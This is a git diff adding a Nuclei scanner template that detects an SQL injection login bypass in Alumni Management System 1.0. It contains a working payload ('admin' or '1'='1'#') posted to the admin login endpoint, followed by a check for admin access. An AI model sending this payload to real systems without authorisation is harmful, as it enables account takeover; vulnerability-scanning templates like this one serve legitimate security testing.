diff --git a/vulnerabilities/other/alumni-sqli.yaml b/vulnerabilities/other/alumni-sqli.yaml new file mode 100644 index 0000000000..10cddf4693 --- /dev/null +++ b/vulnerabilities/other/alumni-sqli.yaml @@ -0,0 +1,36 @@ +id: alumni-sqli + +info: + name: Alumni Management System 1.0 - SQLi Authentication Bypass + author: arafatansari + severity: high + description: | + Alumni Management System Login page can be bypassed with a simple SQLi to the username parameter. + reference: + - https://www.exploit-db.com/exploits/48883 + tags: sqli,bypass,cms + +requests: + - raw: + - | + POST /alumni/admin/ajax.php?action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username=admin'+or+'1'%3D'1'%23&password=nuclei + + - | + GET /alumni/admin/index.php?page=home HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Welcome back Admin!' + + - type: status + status: + - 200